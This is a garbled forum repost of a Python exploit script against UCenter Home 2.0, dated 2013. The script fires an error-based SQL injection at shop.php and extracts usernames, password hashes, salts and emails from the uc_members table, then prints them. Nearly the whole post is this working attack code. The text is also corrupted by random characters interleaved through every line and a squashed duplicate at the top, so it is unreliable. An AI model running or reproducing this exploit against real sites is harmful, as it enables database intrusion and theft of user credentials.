#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
% R) v. [4 x7 n4 W- p1 M( S
! h" S2 z% v3 O1 q- f
' v; W! X6 g, l! c#!/usr/bin/env python ' e8 z+ {9 P5 X" T$ ?
0 u2 @6 R. [+ P8 X! ?. h$ l pimport sys ( K* s; w- T! l" @% F% O- }) N
import urllib2
# V& q) T" `- R5 J2 L. u5 Iimport re
+ K" e/ y( q! B0 S0 e
0 w7 Z6 S* Q5 `) X; y8 Ldef info():
" t5 Y+ f. G1 @8 Z7 q print 'From:http://www.exploit-db.com/exploits/14997/' 0 f0 z( e3 f; Q8 W) b. W; B$ y' b
print 'http://www.hake.cc/Web_loudong/' , n6 R& D8 {" I7 c; s# ]
print 'changed:qiaoy' 6 N9 S! e2 n0 i. M# ?
print 'exp:'
9 c. L) p# n0 u$ l; U% J6 s print ' ./UCenter_Home_2.0.py site'
3 t! M* c/ [# ^9 L, I; S7 J
7 T5 t. `4 S) J4 T. r$ w8 |def main():
9 ~/ {4 C8 _ p% f9 r P if len(sys.argv) != 2: 3 N4 P0 u: \$ y0 G) G* C
info()
4 S( O5 x9 A0 k4 t, l else: 5 v5 K" R( o. i. p7 r- w. \( p# b$ K
site = sys.argv[1] 1 X+ o% ~5 J' f8 S5 E; B( C
if site[0:7] == 'http://':
1 P5 l* R* R+ o. @ X% x- f sitesite =site 4 h4 m2 M& B1 E- ^: }1 }! G$ T
elif site[0:8] == 'https://':
/ w$ Q J$ F+ `/ l/ O; K sitesite = site
- }6 V+ j4 u2 Q( J& C# f else:
4 u* K' G1 e* t3 O6 \6 M% ~( q! \ site = 'http://'+site ( C d0 f. D5 k1 v# l/ Q% T2 L1 b6 @
try: 7 D3 {" H1 Z" _: W! G1 M- ~' N, O
url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'
7 ^1 ^' s9 r3 `) F; R; {; U* y Value = urllib2.urlopen(url).read() 3 A% e. x# z8 H. d, i4 n) I5 T
Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]
+ P t. p# p0 S* Y8 I hacked = Msg.split(':') ' k9 @& K7 f4 _& Q
print 'Name: '+hacked[1]
5 Y; q2 }/ \0 a' R1 x7 C6 M2 b% w print 'Passwd: '+hacked[2] ! l! V( n7 a1 }' \# s
print 'salt: '+hacked[3] 0 D9 m- J8 V6 |
print 'email: '+hacked[4] 0 k, g8 Y; \" t2 f; Y
except:
, T6 n! g/ q. ^ print 'Sorry,I can\'t work............' ' }9 p) B$ n+ Q$ I; W1 T
! `) O/ P# k9 R qif __name__ == '__main__':
1 o; L# e. e$ L/ F% s$ Q' P/ Q main() |
发表于 2013-1-23 09:18:17
收藏
支持
反对